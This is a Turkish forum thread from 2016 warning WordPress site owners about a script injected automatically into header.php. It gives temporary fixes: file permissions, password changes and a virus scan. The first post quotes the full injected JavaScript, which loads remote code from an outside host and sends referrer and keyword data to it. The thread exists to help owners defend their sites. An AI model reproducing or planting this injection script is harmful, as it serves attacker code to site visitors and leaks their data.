• 28-04-2016, 17:41:00
    #1
    Wordpress sitelerin header.php dosyasına (/head dan önce) aşağıdaki gibi otomatik bir script kodu eklenmektedir. Bu bir virüs kodudur. Web sitelerinin yavaş açılması dışında Google virüs uyarısından dolayı siteyi mimleyebilmektedir.
    Bu scrip kodunu sildiğiniz zaman yeniden yüklenecektir.

    Bu virüsten geçiçi olarak kurtulmak için,

    theme klasörünün yazma CMOD değerini 555
    theme nın içindeki tema klasör CMOD değerini 555
    temanızın içindeki header.php dosyasının CMOD değerini 444
    yapın.

    Önlem olarak da;
    wordpress de kayıtlı mail adresinizin şifresini,
    wordpress admin panel şifresini,
    ftp şifresini değiştirin
    Bilgisayarınıza virüs taraması yaptırın.

    Script artık otomatik eklenemeyecektir. Ancak buna neden olan problem yada açık nedenini araştırmanızda yara var.



    <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://baune.be/js/jquery.min.php?c_utt=I92930&c_utm='+encodeURIComponent('http://baune.be/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
  • 28-04-2016, 17:45:22
    #2
    Üyeliği durduruldu
    Dosyalarınız üzerinde backdoor bırakılmış ise söylediklerinizi yapsanızda birşey değişmeyecektir.